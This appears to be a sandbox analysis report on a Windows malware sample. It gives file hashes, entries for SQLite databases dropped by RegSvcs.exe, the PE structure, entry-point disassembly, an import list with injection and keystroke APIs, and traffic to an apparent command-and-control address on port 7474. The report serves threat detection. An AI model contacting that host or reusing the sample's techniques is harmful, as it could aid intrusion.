                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.5890401905077685
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:b3u71vBG0u.exe
                  File size:1'072'128 bytes
                  MD5:464709f3215d06f6703eb4ecb607ae7a
                  SHA1:1f438f2ab699f842cec119981ae5bf799df5d203
                  SHA256:a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36
                  SHA512:007b3d6c7da18c9d8b31991520d18fa2ee323cf8b4d8ea153d74cf93d5bfb38df79bc65a968cc6e07c996c451f0f1c8b2a0b9f0529a6b67ca148cc27adf1eda9
                  SSDEEP:24576:3AHnh+eWsN3skA4RV1Hom2KXMmHaeAfg3sujtg5:qh+ZkldoPK8YaeAfTYg
                  TLSH:DA35AD0277D6C03AFFAB92735B5AB20196BC7D690133852F13983DB9B9701B1236D663
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:c9ac80a0a1a98851
                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x667B661A [Wed Jun 26 00:51:38 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                  Instruction
                  call 00007FE69D06DA3Dh
                  jmp 00007FE69D0607F4h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007FE69D06097Ah
                  cmp edi, eax
                  jc 00007FE69D060CDEh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007FE69D060979h
                  rep movsb
                  jmp 00007FE69D060C8Ch
                  cmp ecx, 00000080h
                  jc 00007FE69D060B44h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007FE69D060980h
                  bt dword ptr [004BF324h], 01h
                  jc 00007FE69D060E50h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007FE69D060B1Dh
                  test edi, 00000003h
                  jne 00007FE69D060B2Eh
                  test esi, 00000003h
                  jne 00007FE69D060B0Dh
                  bt edi, 02h
                  jnc 00007FE69D06097Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007FE69D060983h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007FE69D0609D5h
                  bt esi, 03h
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x3b538.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1040000x7134.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc80000x3b5380x3b60093064427e6e9de530c23632528de4d65False0.5920641447368421data6.149767445220696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1040000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc85480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc86700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc87980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc88c00x1cc1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9485124303763076
                  RT_ICON0xca5840x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishGreat Britain0.07214894120430616
                  RT_ICON0xdadac0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishGreat Britain0.11059282002834199
                  RT_ICON0xdefd40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishGreat Britain0.1491701244813278
                  RT_ICON0xe157c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishGreat Britain0.15806754221388367
                  RT_ICON0xe26240x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishGreat Britain0.2916666666666667
                  RT_MENU0xe2a8c0x50dataEnglishGreat Britain0.9
                  RT_STRING0xe2adc0x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xe30700x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xe36fc0x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xe3b8c0x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xe41880x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xe47e40x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xe4c4c0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xe4da40x1e22edata1.0003726567183526
                  RT_GROUP_ICON0x102fd40x5adataEnglishGreat Britain0.7888888888888889
                  RT_GROUP_ICON0x1030300x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x1030440x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x1030580x14dataEnglishGreat Britain1.25
                  RT_VERSION0x10306c0xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x1031480x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                  DLLImport
                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain
                  TimestampSource PortDest PortSource IPDest IP
                  Jun 28, 2024 08:57:53.178724051 CEST497317474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:57:53.183687925 CEST747449731185.38.142.10192.168.2.4
                  Jun 28, 2024 08:57:53.183784962 CEST497317474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:57:53.199131012 CEST497317474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:57:53.204066038 CEST747449731185.38.142.10192.168.2.4
                  Jun 28, 2024 08:57:53.557035923 CEST497317474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:57:53.561949015 CEST747449731185.38.142.10192.168.2.4
                  Jun 28, 2024 08:57:53.821779013 CEST747449731185.38.142.10192.168.2.4
                  Jun 28, 2024 08:57:53.869379044 CEST497317474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:57:53.958580017 CEST747449731185.38.142.10192.168.2.4
                  Jun 28, 2024 08:57:54.009955883 CEST497317474192.168.2.4185.38.142.10
